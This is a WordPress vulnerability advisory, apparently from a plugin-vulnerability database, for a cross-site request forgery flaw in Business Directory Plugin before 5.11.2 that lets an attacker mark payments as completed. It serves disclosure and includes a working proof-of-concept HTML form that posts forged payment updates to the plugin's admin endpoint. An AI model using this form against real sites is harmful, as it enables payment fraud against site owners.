WordPress Plugin Vulnerabilities
Business Directory Plugin < 5.11.2 - Arbitrary Payment History Update
Description
The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator update arbitrary payment history, such as change their status (from pending to completed to example)
Proof of Concept
Add a listing, don't complete payment (status will be pending) <form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update"> <table> <tbody><tr><td> payment[created_at_date]</td><td><input name="payment[created_at_date]" value="2021-03-31" size="100"></td></tr> <tr><td> payment[created_at_time_hour]</td><td><input name="payment[created_at_time_hour]" value="17" size="100"></td></tr> <tr><td> payment[created_at_time_min]</td><td><input name="payment[created_at_time_min]" value="49" size="100"></td></tr> <tr><td> payment[id]</td><td><input name="payment[id]" value="3" size="100"></td></tr> <tr><td> payment[payer_data][address]</td><td><input name="payment[payer_data][address]" value="" size="100"></td></tr> <tr><td> payment[payer_data][address_2]</td><td><input name="payment[payer_data][address_2]" value="" size="100"></td></tr> <tr><td> payment[payer_data][city]</td><td><input name="payment[payer_data][city]" value="" size="100"></td></tr> <tr><td> payment[payer_data][country]</td><td><input name="payment[payer_data][country]" value="" size="100"></td></tr> <tr><td> payment[payer_data][state]</td><td><input name="payment[payer_data][state]" value="" size="100"></td></tr> <tr><td> payment[payer_data][zip]</td><td><input name="payment[payer_data][zip]" value="" size="100"></td></tr> <tr><td> payment[payer_email]</td><td><input name="payment[payer_email]" value="[email protected]" size="100"></td></tr> <tr><td> payment[payer_first_name]</td><td><input name="payment[payer_first_name]" value="" size="100"></td></tr> <tr><td> payment[payer_last_name]</td><td><input name="payment[payer_last_name]" value="" size="100"></td></tr> <tr><td> payment[status]</td><td><input name="payment[status]" value="completed" size="100"></td></tr> <tr><td> payment_note</td><td><input name="payment_note" value="" size="100"></td></tr> </tbody></table> <input id="submit" type="submit" value="Submit"> </form>
Affects Plugins
Fixed in version 5.11.2
References
Classification
Miscellaneous
Original Researcher
0xB9
Submitter
0xB9
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-12 (about 1 years ago)
Added
2021-04-12 (about 1 years ago)
Last Updated
2021-04-14 (about 1 years ago)